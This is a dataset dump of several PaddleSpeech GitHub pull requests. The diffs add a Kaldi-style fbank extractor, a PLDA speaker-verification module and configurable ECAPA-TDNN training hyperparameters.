repo
stringclasses
856 values
pull_number
int64
3
127k
instance_id
stringlengths
12
58
issue_numbers
sequencelengths
1
5
base_commit
stringlengths
40
40
patch
stringlengths
67
1.54M
test_patch
stringlengths
0
107M
problem_statement
stringlengths
3
307k
hints_text
stringlengths
0
908k
created_at
timestamp[s]
PaddlePaddle/PaddleSpeech
1,612
PaddlePaddle__PaddleSpeech-1612
[ "1611" ]
2177a19dd9d79831e7a0b1bac1201588dc44d821
diff --git a/paddlespeech/s2t/transform/spectrogram.py b/paddlespeech/s2t/transform/spectrogram.py --- a/paddlespeech/s2t/transform/spectrogram.py +++ b/paddlespeech/s2t/transform/spectrogram.py @@ -14,8 +14,11 @@ # Modified from espnet(https://github.com/espnet/espnet) import librosa import numpy as np +import paddle from python_speech_features import logfbank +import paddleaudio.compliance.kaldi as kaldi + def stft(x, n_fft, @@ -309,6 +312,77 @@ def __call__(self, x): class LogMelSpectrogramKaldi(): + def __init__( + self, + fs=16000, + n_mels=80, + n_shift=160, # unit:sample, 10ms + win_length=400, # unit:sample, 25ms + energy_floor=0.0, + dither=0.1): + """ + The Kaldi implementation of LogMelSpectrogram + Args: + fs (int): sample rate of the audio + n_mels (int): number of mel filter banks + n_shift (int): number of points in a frame shift + win_length (int): number of points in a frame windows + energy_floor (float): Floor on energy in Spectrogram computation (absolute) + dither (float): Dithering constant + + Returns: + LogMelSpectrogramKaldi + """ + + self.fs = fs + self.n_mels = n_mels + num_point_ms = fs / 1000 + self.n_frame_length = win_length / num_point_ms + self.n_frame_shift = n_shift / num_point_ms + self.energy_floor = energy_floor + self.dither = dither + + def __repr__(self): + return ( + "{name}(fs={fs}, n_mels={n_mels}, " + "n_frame_shift={n_frame_shift}, n_frame_length={n_frame_length}, " + "dither={dither}))".format( + name=self.__class__.__name__, + fs=self.fs, + n_mels=self.n_mels, + n_frame_shift=self.n_frame_shift, + n_frame_length=self.n_frame_length, + dither=self.dither, )) + + def __call__(self, x, train): + """ + Args: + x (np.ndarray): shape (Ti,) + train (bool): True, train mode. + + Raises: + ValueError: not support (Ti, C) + + Returns: + np.ndarray: (T, D) + """ + dither = self.dither if train else 0.0 + if x.ndim != 1: + raise ValueError("Not support x: [Time, Channel]") + waveform = paddle.to_tensor(np.expand_dims(x, 0), dtype=paddle.float32) + mat = kaldi.fbank( + waveform, + n_mels=self.n_mels, + frame_length=self.n_frame_length, + frame_shift=self.n_frame_shift, + dither=dither, + energy_floor=self.energy_floor, + sr=self.fs) + mat = np.squeeze(mat.numpy()) + return mat + + +class LogMelSpectrogramKaldi_decay(): def __init__( self, fs=16000, diff --git a/paddlespeech/s2t/transform/transformation.py b/paddlespeech/s2t/transform/transformation.py --- a/paddlespeech/s2t/transform/transformation.py +++ b/paddlespeech/s2t/transform/transformation.py @@ -31,6 +31,7 @@ freq_mask="paddlespeech.s2t.transform.spec_augment:FreqMask", spec_augment="paddlespeech.s2t.transform.spec_augment:SpecAugment", speed_perturbation="paddlespeech.s2t.transform.perturb:SpeedPerturbation", + speed_perturbation_sox="paddlespeech.s2t.transform.perturb:SpeedPerturbationSox", volume_perturbation="paddlespeech.s2t.transform.perturb:VolumePerturbation", noise_injection="paddlespeech.s2t.transform.perturb:NoiseInjection", bandpass_perturbation="paddlespeech.s2t.transform.perturb:BandpassPerturbation",
[asr]使用 paddleaudio 的 kaldi fbank 替换原有的 kaldi fbank
2022-03-28T03:39:32
PaddlePaddle/PaddleSpeech
1,644
PaddlePaddle__PaddleSpeech-1644
[ "1608" ]
e366fb6b2feeba384ae1507da707a38c72c78562
diff --git a/demos/audio_searching/src/encode.py b/demos/audio_searching/src/encode.py --- a/demos/audio_searching/src/encode.py +++ b/demos/audio_searching/src/encode.py @@ -12,8 +12,8 @@ # See the License for the specific language governing permissions and # limitations under the License. import numpy as np -from logs import LOGGER +from logs import LOGGER from paddlespeech.cli import VectorExecutor vector_executor = VectorExecutor() @@ -24,7 +24,8 @@ def get_audio_embedding(path): Use vpr_inference to generate embedding of audio """ try: - embedding = vector_executor(audio_file=path) + embedding = vector_executor( + audio_file=path, model='ecapatdnn_voxceleb12') embedding = embedding / np.linalg.norm(embedding) embedding = embedding.tolist() return embedding
[vec][search] update to paddlespeech model
2022-04-02T14:33:07
PaddlePaddle/PaddleSpeech
1,681
PaddlePaddle__PaddleSpeech-1681
[ "1667" ]
0cde9f87abe07ac67d748fc8815194ee2794f17b
diff --git a/paddlespeech/vector/cluster/diarization.py b/paddlespeech/vector/cluster/diarization.py --- a/paddlespeech/vector/cluster/diarization.py +++ b/paddlespeech/vector/cluster/diarization.py @@ -1,4 +1,4 @@ -# Copyright (c) 2022 SpeechBrain Authors. All Rights Reserved. +# Copyright (c) 2022 PaddlePaddle and SpeechBrain Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -18,12 +18,14 @@ A few sklearn functions are modified in this script as per requirement. """ import argparse +import copy import warnings from distutils.util import strtobool import numpy as np import scipy import sklearn +from scipy import linalg from scipy import sparse from scipy.sparse.csgraph import connected_components from scipy.sparse.csgraph import laplacian as csgraph_laplacian @@ -346,6 +348,8 @@ class EmbeddingMeta: --------- segset : list List of session IDs as an array of strings. + modelset : list + List of model IDs as an array of strings. stats : tensor An ndarray of float64. Each line contains embedding from the corresponding session. @@ -354,15 +358,20 @@ class EmbeddingMeta: def __init__( self, segset=None, + modelset=None, stats=None, ): if segset is None: - self.segset = numpy.empty(0, dtype="|O") - self.stats = numpy.array([], dtype=np.float64) + self.segset = np.empty(0, dtype="|O") + self.modelset = np.empty(0, dtype="|O") + self.stats = np.array([], dtype=np.float64) else: self.segset = segset + self.modelset = modelset self.stats = stats + self.stat0 = np.array([[1.0]] * self.stats.shape[0]) + def norm_stats(self): """ Divide all first-order statistics by their Euclidean norm. @@ -371,6 +380,188 @@ def norm_stats(self): vect_norm = np.clip(np.linalg.norm(self.stats, axis=1), 1e-08, np.inf) self.stats = (self.stats.transpose() / vect_norm).transpose() + def get_mean_stats(self): + """ + Return the mean of first order statistics. + """ + mu = np.mean(self.stats, axis=0) + return mu + + def get_total_covariance_stats(self): + """ + Compute and return the total covariance matrix of the first-order statistics. + """ + C = self.stats - self.stats.mean(axis=0) + return np.dot(C.transpose(), C) / self.stats.shape[0] + + def get_model_stat0(self, mod_id): + """Return zero-order statistics of a given model + + Arguments + --------- + mod_id : str + ID of the model which stat0 will be returned. + """ + S = self.stat0[self.modelset == mod_id, :] + return S + + def get_model_stats(self, mod_id): + """Return first-order statistics of a given model. + + Arguments + --------- + mod_id : str + ID of the model which stat1 will be returned. + """ + return self.stats[self.modelset == mod_id, :] + + def sum_stat_per_model(self): + """ + Sum the zero- and first-order statistics per model and store them + in a new EmbeddingMeta. + Returns a EmbeddingMeta object with the statistics summed per model + and a numpy array with session_per_model. + """ + + sts_per_model = EmbeddingMeta() + sts_per_model.modelset = np.unique( + self.modelset) # nd: get uniq spkr ids + sts_per_model.segset = copy.deepcopy(sts_per_model.modelset) + sts_per_model.stat0 = np.zeros( + (sts_per_model.modelset.shape[0], self.stat0.shape[1]), + dtype=np.float64, ) + sts_per_model.stats = np.zeros( + (sts_per_model.modelset.shape[0], self.stats.shape[1]), + dtype=np.float64, ) + + session_per_model = np.zeros(np.unique(self.modelset).shape[0]) + + # For each model sum the stats + for idx, model in enumerate(sts_per_model.modelset): + sts_per_model.stat0[idx, :] = self.get_model_stat0(model).sum( + axis=0) + sts_per_model.stats[idx, :] = self.get_model_stats(model).sum( + axis=0) + session_per_model[idx] += self.get_model_stats(model).shape[0] + return sts_per_model, session_per_model + + def center_stats(self, mu): + """ + Center first order statistics. + + Arguments + --------- + mu : array + Array to center on. + """ + + dim = self.stats.shape[1] / self.stat0.shape[1] + index_map = np.repeat(np.arange(self.stat0.shape[1]), dim) + self.stats = self.stats - (self.stat0[:, index_map] * + mu.astype(np.float64)) + + def rotate_stats(self, R): + """ + Rotate first-order statistics by a right-product. + + Arguments + --------- + R : ndarray + Matrix to use for right product on the first order statistics. + """ + self.stats = np.dot(self.stats, R) + + def whiten_stats(self, mu, sigma, isSqrInvSigma=False): + """ + Whiten first-order statistics + If sigma.ndim == 1, case of a diagonal covariance. + If sigma.ndim == 2, case of a single Gaussian with full covariance. + If sigma.ndim == 3, case of a full covariance UBM. + + Arguments + --------- + mu : array + Mean vector to be subtracted from the statistics. + sigma : narray + Co-variance matrix or covariance super-vector. + isSqrInvSigma : bool + True if the input Sigma matrix is the inverse of the square root of a covariance matrix. + """ + + if sigma.ndim == 1: + self.center_stats(mu) + self.stats = self.stats / np.sqrt(sigma.astype(np.float64)) + + elif sigma.ndim == 2: + # Compute the inverse square root of the co-variance matrix Sigma + sqr_inv_sigma = sigma + + if not isSqrInvSigma: + # eigen_values, eigen_vectors = scipy.linalg.eigh(sigma) + eigen_values, eigen_vectors = linalg.eigh(sigma) + ind = eigen_values.real.argsort()[::-1] + eigen_values = eigen_values.real[ind] + eigen_vectors = eigen_vectors.real[:, ind] + + sqr_inv_eval_sigma = 1 / np.sqrt(eigen_values.real) + sqr_inv_sigma = np.dot(eigen_vectors, + np.diag(sqr_inv_eval_sigma)) + else: + pass + + # Whitening of the first-order statistics + self.center_stats(mu) # CENTERING + self.rotate_stats(sqr_inv_sigma) + + elif sigma.ndim == 3: + # we assume that sigma is a 3D ndarray of size D x n x n + # where D is the number of distributions and n is the dimension of a single distribution + n = self.stats.shape[1] // self.stat0.shape[1] + sess_nb = self.stat0.shape[0] + self.center_stats(mu) + self.stats = (np.einsum("ikj,ikl->ilj", + self.stats.T.reshape(-1, n, sess_nb), sigma) + .reshape(-1, sess_nb).T) + + else: + raise Exception("Wrong dimension of Sigma, must be 1 or 2") + + def align_models(self, model_list): + """ + Align models of the current EmbeddingMeta to match a list of models + provided as input parameter. The size of the StatServer might be + reduced to match the input list of models. + + Arguments + --------- + model_list : ndarray of strings + List of models to match. + """ + indx = np.array( + [np.argwhere(self.modelset == v)[0][0] for v in model_list]) + self.segset = self.segset[indx] + self.modelset = self.modelset[indx] + self.stat0 = self.stat0[indx, :] + self.stats = self.stats[indx, :] + + def align_segments(self, segment_list): + """ + Align segments of the current EmbeddingMeta to match a list of segment + provided as input parameter. The size of the StatServer might be + reduced to match the input list of segments. + + Arguments + --------- + segment_list: ndarray of strings + list of segments to match + """ + indx = np.array( + [np.argwhere(self.segset == v)[0][0] for v in segment_list]) + self.segset = self.segset[indx] + self.modelset = self.modelset[indx] + self.stat0 = self.stat0[indx, :] + self.stats = self.stats[indx, :] + class SpecClustUnorm: """ diff --git a/paddlespeech/vector/cluster/plda.py b/paddlespeech/vector/cluster/plda.py new file mode 100644 --- /dev/null +++ b/paddlespeech/vector/cluster/plda.py @@ -0,0 +1,575 @@ +# Copyright (c) 2022 PaddlePaddle and SpeechBrain Authors. All Rights Reserved. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +"""A popular speaker recognition/diarization model (LDA and PLDA). + +Relevant Papers + - This implementation of PLDA is based on the following papers. + + - PLDA model Training + * Ye Jiang et. al, "PLDA Modeling in I-Vector and Supervector Space for Speaker Verification," in Interspeech, 2012. + * Patrick Kenny et. al, "PLDA for speaker verification with utterances of arbitrary duration," in ICASSP, 2013. + + - PLDA scoring (fast scoring) + * Daniel Garcia-Romero et. al, “Analysis of i-vector length normalization in speaker recognition systems,” in Interspeech, 2011. + * Weiwei-LIN et. al, "Fast Scoring for PLDA with Uncertainty Propagation," in Odyssey, 2016. + * Kong Aik Lee et. al, "Multi-session PLDA Scoring of I-vector for Partially Open-Set Speaker Detection," in Interspeech 2013. + +Credits + This code is adapted from: https://git-lium.univ-lemans.fr/Larcher/sidekit +""" +import copy +import pickle + +import numpy +from scipy import linalg + +from paddlespeech.vector.cluster.diarization import EmbeddingMeta + + +def ismember(list1, list2): + c = [item in list2 for item in list1] + return c + + +class Ndx: + """ + A class that encodes trial index information. It has a list of + model names and a list of test segment names and a matrix + indicating which combinations of model and test segment are + trials of interest. + + Arguments + --------- + modelset : list + List of unique models in a ndarray. + segset : list + List of unique test segments in a ndarray. + trialmask : 2D ndarray of bool. + Rows correspond to the models and columns to the test segments. True, if the trial is of interest. + """ + + def __init__(self, + ndx_file_name="", + models=numpy.array([]), + testsegs=numpy.array([])): + """ + Initialize a Ndx object by loading information from a file. + + Arguments + --------- + ndx_file_name : str + Name of the file to load. + """ + self.modelset = numpy.empty(0, dtype="|O") + self.segset = numpy.empty(0, dtype="|O") + self.trialmask = numpy.array([], dtype="bool") + + if ndx_file_name == "": + # This is needed to make sizes same + d = models.shape[0] - testsegs.shape[0] + if d != 0: + if d > 0: + last = str(testsegs[-1]) + pad = numpy.array([last] * d) + testsegs = numpy.hstack((testsegs, pad)) + # pad = testsegs[-d:] + # testsegs = numpy.concatenate((testsegs, pad), axis=1) + else: + d = abs(d) + last = str(models[-1]) + pad = numpy.array([last] * d) + models = numpy.hstack((models, pad)) + # pad = models[-d:] + # models = numpy.concatenate((models, pad), axis=1) + + modelset = numpy.unique(models) + segset = numpy.unique(testsegs) + + trialmask = numpy.zeros( + (modelset.shape[0], segset.shape[0]), dtype="bool") + for m in range(modelset.shape[0]): + segs = testsegs[numpy.array(ismember(models, modelset[m]))] + trialmask[m, ] = ismember(segset, segs) # noqa E231 + + self.modelset = modelset + self.segset = segset + self.trialmask = trialmask + assert self.validate(), "Wrong Ndx format" + + else: + ndx = Ndx.read(ndx_file_name) + self.modelset = ndx.modelset + self.segset = ndx.segset + self.trialmask = ndx.trialmask + + def save_ndx_object(self, output_file_name): + with open(output_file_name, "wb") as output: + pickle.dump(self, output, pickle.HIGHEST_PROTOCOL) + + def filter(self, modlist, seglist, keep): + """ + Removes some of the information in an Ndx. Useful for creating a + gender specific Ndx from a pooled gender Ndx. Depending on the + value of \'keep\', the two input lists indicate the strings to + retain or the strings to discard. + + Arguments + --------- + modlist : array + A cell array of strings which will be compared with the modelset of 'inndx'. + seglist : array + A cell array of strings which will be compared with the segset of 'inndx'. + keep : bool + Indicating whether modlist and seglist are the models to keep or discard. + """ + if keep: + keepmods = modlist + keepsegs = seglist + else: + keepmods = diff(self.modelset, modlist) + keepsegs = diff(self.segset, seglist) + + keepmodidx = numpy.array(ismember(self.modelset, keepmods)) + keepsegidx = numpy.array(ismember(self.segset, keepsegs)) + + outndx = Ndx() + outndx.modelset = self.modelset[keepmodidx] + outndx.segset = self.segset[keepsegidx] + tmp = self.trialmask[numpy.array(keepmodidx), :] + outndx.trialmask = tmp[:, numpy.array(keepsegidx)] + + assert outndx.validate, "Wrong Ndx format" + + if self.modelset.shape[0] > outndx.modelset.shape[0]: + print( + "Number of models reduced from %d to %d" % + self.modelset.shape[0], + outndx.modelset.shape[0], ) + if self.segset.shape[0] > outndx.segset.shape[0]: + print( + "Number of test segments reduced from %d to %d", + self.segset.shape[0], + outndx.segset.shape[0], ) + return outndx + + def validate(self): + """ + Checks that an object of type Ndx obeys certain rules that + must always be true. Returns a boolean value indicating whether the object is valid + """ + ok = isinstance(self.modelset, numpy.ndarray) + ok &= isinstance(self.segset, numpy.ndarray) + ok &= isinstance(self.trialmask, numpy.ndarray) + + ok &= self.modelset.ndim == 1 + ok &= self.segset.ndim == 1 + ok &= self.trialmask.ndim == 2 + + ok &= self.trialmask.shape == (self.modelset.shape[0], + self.segset.shape[0], ) + return ok + + +class Scores: + """ + A class for storing scores for trials. The modelset and segset + fields are lists of model and test segment names respectively. + The element i,j of scoremat and scoremask corresponds to the + trial involving model i and test segment j. + + Arguments + --------- + modelset : list + List of unique models in a ndarray. + segset : list + List of unique test segments in a ndarray. + scoremask : 2D ndarray of bool + Indicates the trials of interest, i.e., + the entry i,j in scoremat should be ignored if scoremask[i,j] is False. + scoremat : 2D ndarray + Scores matrix. + """ + + def __init__(self, scores_file_name=""): + """ + Initialize a Scores object by loading information from a file HDF5 format. + + Arguments + --------- + scores_file_name : str + Name of the file to load. + """ + self.modelset = numpy.empty(0, dtype="|O") + self.segset = numpy.empty(0, dtype="|O") + self.scoremask = numpy.array([], dtype="bool") + self.scoremat = numpy.array([]) + + if scores_file_name == "": + pass + else: + tmp = Scores.read(scores_file_name) + self.modelset = tmp.modelset + self.segset = tmp.segset + self.scoremask = tmp.scoremask + self.scoremat = tmp.scoremat + + def __repr__(self): + ch = "modelset:\n" + ch += self.modelset + "\n" + ch += "segset:\n" + ch += self.segset + "\n" + ch += "scoremask:\n" + ch += self.scoremask.__repr__() + "\n" + ch += "scoremat:\n" + ch += self.scoremat.__repr__() + "\n" + + +def fa_model_loop( + batch_start, + mini_batch_indices, + factor_analyser, + stat0, + stats, + e_h, + e_hh, ): + """ + A function for PLDA estimation. + + Arguments + --------- + batch_start : int + Index to start at in the list. + mini_batch_indices : list + Indices of the elements in the list (should start at zero). + factor_analyser : instance of PLDA class + PLDA class object. + stat0 : tensor + Matrix of zero-order statistics. + stats: tensor + Matrix of first-order statistics. + e_h : tensor + An accumulator matrix. + e_hh: tensor + An accumulator matrix. + """ + rank = factor_analyser.F.shape[1] + if factor_analyser.Sigma.ndim == 2: + A = factor_analyser.F.T.dot(factor_analyser.F) + inv_lambda_unique = dict() + for sess in numpy.unique(stat0[:, 0]): + inv_lambda_unique[sess] = linalg.inv(sess * A + numpy.eye(A.shape[ + 0])) + + tmp = numpy.zeros( + (factor_analyser.F.shape[1], factor_analyser.F.shape[1]), + dtype=numpy.float64, ) + + for idx in mini_batch_indices: + if factor_analyser.Sigma.ndim == 1: + inv_lambda = linalg.inv( + numpy.eye(rank) + (factor_analyser.F.T * stat0[ + idx + batch_start, :]).dot(factor_analyser.F)) + else: + inv_lambda = inv_lambda_unique[stat0[idx + batch_start, 0]] + + aux = factor_analyser.F.T.dot(stats[idx + batch_start, :]) + numpy.dot(aux, inv_lambda, out=e_h[idx]) + e_hh[idx] = inv_lambda + numpy.outer(e_h[idx], e_h[idx], tmp) + + +def _check_missing_model(enroll, test, ndx): + # Remove missing models and test segments + clean_ndx = ndx.filter(enroll.modelset, test.segset, True) + + # Align EmbeddingMeta to match the clean_ndx + enroll.align_models(clean_ndx.modelset) + test.align_segments(clean_ndx.segset) + + return clean_ndx + + +class PLDA: + """ + A class to train PLDA model from embeddings. + + The input is in paddlespeech.vector.cluster.diarization.EmbeddingMeta format. + Trains a simplified PLDA model no within-class covariance matrix but full residual covariance matrix. + + Arguments + --------- + mean : tensor + Mean of the vectors. + F : tensor + Eigenvoice matrix. + Sigma : tensor + Residual matrix. + """ + + def __init__( + self, + mean=None, + F=None, + Sigma=None, + rank_f=100, + nb_iter=10, + scaling_factor=1.0, ): + self.mean = None + self.F = None + self.Sigma = None + self.rank_f = rank_f + self.nb_iter = nb_iter + self.scaling_factor = scaling_factor + + if mean is not None: + self.mean = mean + if F is not None: + self.F = F + if Sigma is not None: + self.Sigma = Sigma + + def plda( + self, + emb_meta=None, + output_file_name=None, ): + """ + Trains PLDA model with no within class covariance matrix but full residual covariance matrix. + + Arguments + --------- + emb_meta : paddlespeech.vector.cluster.diarization.EmbeddingMeta + Contains vectors and meta-information to perform PLDA + rank_f : int + Rank of the between-class covariance matrix. + nb_iter : int + Number of iterations to run. + scaling_factor : float + Scaling factor to downscale statistics (value between 0 and 1). + output_file_name : str + Name of the output file where to store PLDA model. + """ + + # Dimension of the vector (x-vectors stored in stats) + vect_size = emb_meta.stats.shape[1] + + # Initialize mean and residual covariance from the training data + self.mean = emb_meta.get_mean_stats() + self.Sigma = emb_meta.get_total_covariance_stats() + + # Sum stat0 and stat1 for each speaker model + model_shifted_stat, session_per_model = emb_meta.sum_stat_per_model() + + # Number of speakers (classes) in training set + class_nb = model_shifted_stat.modelset.shape[0] + + # Multiply statistics by scaling_factor + model_shifted_stat.stat0 *= self.scaling_factor + model_shifted_stat.stats *= self.scaling_factor + session_per_model *= self.scaling_factor + + # Covariance for stats + sigma_obs = emb_meta.get_total_covariance_stats() + evals, evecs = linalg.eigh(sigma_obs) + + # Initial F (eigen voice matrix) from rank + idx = numpy.argsort(evals)[::-1] + evecs = evecs.real[:, idx[:self.rank_f]] + self.F = evecs[:, :self.rank_f] + + # Estimate PLDA model by iterating the EM algorithm + for it in range(self.nb_iter): + + # E-step + + # Copy stats as they will be whitened with a different Sigma for each iteration + local_stat = copy.deepcopy(model_shifted_stat) + + # Whiten statistics (with the new mean and Sigma) + local_stat.whiten_stats(self.mean, self.Sigma) + + # Whiten the EigenVoice matrix + eigen_values, eigen_vectors = linalg.eigh(self.Sigma) + ind = eigen_values.real.argsort()[::-1] + eigen_values = eigen_values.real[ind] + eigen_vectors = eigen_vectors.real[:, ind] + sqr_inv_eval_sigma = 1 / numpy.sqrt(eigen_values.real) + sqr_inv_sigma = numpy.dot(eigen_vectors, + numpy.diag(sqr_inv_eval_sigma)) + self.F = sqr_inv_sigma.T.dot(self.F) + + # Replicate self.stat0 + index_map = numpy.zeros(vect_size, dtype=int) + _stat0 = local_stat.stat0[:, index_map] + + e_h = numpy.zeros((class_nb, self.rank_f)) + e_hh = numpy.zeros((class_nb, self.rank_f, self.rank_f)) + + # loop on model id's + fa_model_loop( + batch_start=0, + mini_batch_indices=numpy.arange(class_nb), + factor_analyser=self, + stat0=_stat0, + stats=local_stat.stats, + e_h=e_h, + e_hh=e_hh, ) + + # Accumulate for minimum divergence step + _R = numpy.sum(e_hh, axis=0) / session_per_model.shape[0] + + _C = e_h.T.dot(local_stat.stats).dot(linalg.inv(sqr_inv_sigma)) + _A = numpy.einsum("ijk,i->jk", e_hh, local_stat.stat0.squeeze()) + + # M-step + self.F = linalg.solve(_A, _C).T + + # Update the residual covariance + self.Sigma = sigma_obs - self.F.dot(_C) / session_per_model.sum() + + # Minimum Divergence step + self.F = self.F.dot(linalg.cholesky(_R)) + + def scoring( + self, + enroll, + test, + ndx, + test_uncertainty=None, + Vtrans=None, + p_known=0.0, + scaling_factor=1.0, + check_missing=True, ): + """ + Compute the PLDA scores between to sets of vectors. The list of + trials to perform is given in an Ndx object. PLDA matrices have to be + pre-computed. i-vectors/x-vectors are supposed to be whitened before. + + Arguments + --------- + enroll : paddlespeech.vector.cluster.diarization.EmbeddingMeta + A EmbeddingMeta in which stats are xvectors. + test : paddlespeech.vector.cluster.diarization.EmbeddingMeta + A EmbeddingMeta in which stats are xvectors. + ndx : paddlespeech.vector.cluster.plda.Ndx + An Ndx object defining the list of trials to perform. + p_known : float + Probability of having a known speaker for open-set + identification case (=1 for the verification task and =0 for the + closed-set case). + check_missing : bool + If True, check that all models and segments exist. + """ + + enroll_ctr = copy.deepcopy(enroll) + test_ctr = copy.deepcopy(test) + + # Remove missing models and test segments + if check_missing: + clean_ndx = _check_missing_model(enroll_ctr, test_ctr, ndx) + else: + clean_ndx = ndx + + # Center the i-vectors around the PLDA mean + enroll_ctr.center_stats(self.mean) + test_ctr.center_stats(self.mean) + + # Compute constant component of the PLDA distribution + invSigma = linalg.inv(self.Sigma) + I_spk = numpy.eye(self.F.shape[1], dtype="float") + + K = self.F.T.dot(invSigma * scaling_factor).dot(self.F) + K1 = linalg.inv(K + I_spk) + K2 = linalg.inv(2 * K + I_spk) + + # Compute the Gaussian distribution constant + alpha1 = numpy.linalg.slogdet(K1)[1] + alpha2 = numpy.linalg.slogdet(K2)[1] + plda_cst = alpha2 / 2.0 - alpha1 + + # Compute intermediate matrices + Sigma_ac = numpy.dot(self.F, self.F.T) + Sigma_tot = Sigma_ac + self.Sigma + Sigma_tot_inv = linalg.inv(Sigma_tot) + + Tmp = linalg.inv(Sigma_tot - Sigma_ac.dot(Sigma_tot_inv).dot(Sigma_ac)) + Phi = Sigma_tot_inv - Tmp + Psi = Sigma_tot_inv.dot(Sigma_ac).dot(Tmp) + + # Compute the different parts of PLDA score + model_part = 0.5 * numpy.einsum("ij, ji->i", + enroll_ctr.stats.dot(Phi), + enroll_ctr.stats.T) + seg_part = 0.5 * numpy.einsum("ij, ji->i", + test_ctr.stats.dot(Phi), test_ctr.stats.T) + + # Compute verification scores + score = Scores() # noqa F821 + score.modelset = clean_ndx.modelset + score.segset = clean_ndx.segset + score.scoremask = clean_ndx.trialmask + + score.scoremat = model_part[:, numpy.newaxis] + seg_part + plda_cst + score.scoremat += enroll_ctr.stats.dot(Psi).dot(test_ctr.stats.T) + score.scoremat *= scaling_factor + + # Case of open-set identification, we compute the log-likelihood + # by taking into account the probability of having a known impostor + # or an out-of set class + if p_known != 0: + N = score.scoremat.shape[0] + open_set_scores = numpy.empty(score.scoremat.shape) + tmp = numpy.exp(score.scoremat) + for ii in range(N): + # open-set term + open_set_scores[ii, :] = score.scoremat[ii, :] - numpy.log( + p_known * tmp[~(numpy.arange(N) == ii)].sum(axis=0) / ( + N - 1) + (1 - p_known)) + score.scoremat = open_set_scores + + return score + + +if __name__ == '__main__': + import random + + dim, N, n_spkrs = 10, 100, 10 + train_xv = numpy.random.rand(N, dim) + md = ['md' + str(random.randrange(1, n_spkrs, 1)) for i in range(N)] # spk + modelset = numpy.array(md, dtype="|O") + sg = ['sg' + str(i) for i in range(N)] # utt + segset = numpy.array(sg, dtype="|O") + stat0 = numpy.array([[1.0]] * N) + xvectors_stat = EmbeddingMeta( + modelset=modelset, segset=segset, stats=train_xv) + # Training PLDA model: M ~ (mean, F, Sigma) + plda = PLDA(rank_f=5) + plda.plda(xvectors_stat) + print(plda.mean.shape) #(10,) + print(plda.F.shape) #(10, 5) + print(plda.Sigma.shape) #(10, 10) + # Enrollment (20 utts), + en_N = 20 + en_xv = numpy.random.rand(en_N, dim) + en_sgs = ['en' + str(i) for i in range(en_N)] + en_sets = numpy.array(en_sgs, dtype="|O") + en_stat = EmbeddingMeta(modelset=en_sets, segset=en_sets, stats=en_xv) + # Test (30 utts) + te_N = 30 + te_xv = numpy.random.rand(te_N, dim) + te_sgs = ['te' + str(i) for i in range(te_N)] + te_sets = numpy.array(te_sgs, dtype="|O") + te_stat = EmbeddingMeta(modelset=te_sets, segset=te_sets, stats=te_xv) + ndx = Ndx(models=en_sets, testsegs=te_sets) # trials + # PLDA Scoring + scores_plda = plda.scoring(en_stat, te_stat, ndx) + print(scores_plda.scoremat.shape) #(20, 30) diff --git a/paddlespeech/vector/io/dataset_from_json.py b/paddlespeech/vector/io/dataset_from_json.py --- a/paddlespeech/vector/io/dataset_from_json.py +++ b/paddlespeech/vector/io/dataset_from_json.py @@ -26,14 +26,14 @@ class meta_info: """the audio meta info in the vector JSONDataset Args: - id (str): the segment name + utt_id (str): the segment name duration (float): segment time wav (str): wav file path start (int): start point in the original wav file stop (int): stop point in the original wav file lab_id (str): the record id """ - id: str + utt_id: str duration: float wav: str start: int
[vec] add PLDA model
2022-04-08T10:17:52
PaddlePaddle/PaddleSpeech
1,690
PaddlePaddle__PaddleSpeech-1690
[ "1689" ]
48e017776783b49a5769ce6ac37e1ad67bac9ec0
diff --git a/paddlespeech/vector/exps/ecapa_tdnn/train.py b/paddlespeech/vector/exps/ecapa_tdnn/train.py --- a/paddlespeech/vector/exps/ecapa_tdnn/train.py +++ b/paddlespeech/vector/exps/ecapa_tdnn/train.py @@ -42,6 +42,12 @@ def main(args, config): + """The main process for test the speaker verification model + + Args: + args (argparse.Namespace): the command line args namespace + config (yacs.config.CfgNode): the yaml config + """ # stage0: set the training device, cpu or gpu paddle.set_device(args.device) @@ -49,11 +55,11 @@ def main(args, config): paddle.distributed.init_parallel_env() nranks = paddle.distributed.get_world_size() local_rank = paddle.distributed.get_rank() - # set the random seed, it is a must for multiprocess training + # set the random seed, it is the necessary measures for multiprocess training seed_everything(config.seed) # stage2: data prepare, such vox1 and vox2 data, and augment noise data and pipline - # note: some cmd must do in rank==0, so wo will refactor the data prepare code + # note: some operations must be done in rank==0 train_dataset = CSVDataset( csv_path=os.path.join(args.data_dir, "vox/csv/train.csv"), label2id_path=os.path.join(args.data_dir, "vox/meta/label2id.txt")) @@ -61,12 +67,14 @@ def main(args, config): csv_path=os.path.join(args.data_dir, "vox/csv/dev.csv"), label2id_path=os.path.join(args.data_dir, "vox/meta/label2id.txt")) + # we will build the augment pipeline process list if config.augment: augment_pipeline = build_augment_pipeline(target_dir=args.data_dir) else: augment_pipeline = [] # stage3: build the dnn backbone model network + # in speaker verification period, we use the backbone mode to extract the audio embedding ecapa_tdnn = EcapaTdnn(**config.model) # stage4: build the speaker verification train instance with backbone model @@ -77,13 +85,15 @@ def main(args, config): # 140000 is single gpu steps # so, in multi-gpu mode, wo reduce the step_size to 140000//nranks to enable CyclicLRScheduler lr_schedule = CyclicLRScheduler( - base_lr=config.learning_rate, max_lr=1e-3, step_size=140000 // nranks) + base_lr=config.learning_rate, + max_lr=config.max_lr, + step_size=config.step_size // nranks) optimizer = paddle.optimizer.AdamW( learning_rate=lr_schedule, parameters=model.parameters()) # stage6: build the loss function, we now only support LogSoftmaxWrapper criterion = LogSoftmaxWrapper( - loss_fn=AdditiveAngularMargin(margin=0.2, scale=30)) + loss_fn=AdditiveAngularMargin(margin=config.margin, scale=config.scale)) # stage7: confirm training start epoch # if pre-trained model exists, start epoch confirmed by the pre-trained model @@ -225,7 +235,7 @@ def main(args, config): print_msg += ' avg_train_cost: {:.5f} sec,'.format( train_run_cost / config.log_interval) - print_msg += ' lr={:.4E} step/sec={:.2f} ips:{:.5f}| ETA {}'.format( + print_msg += ' lr={:.4E} step/sec={:.2f} ips={:.5f}| ETA {}'.format( lr, timer.timing, timer.ips, timer.eta) 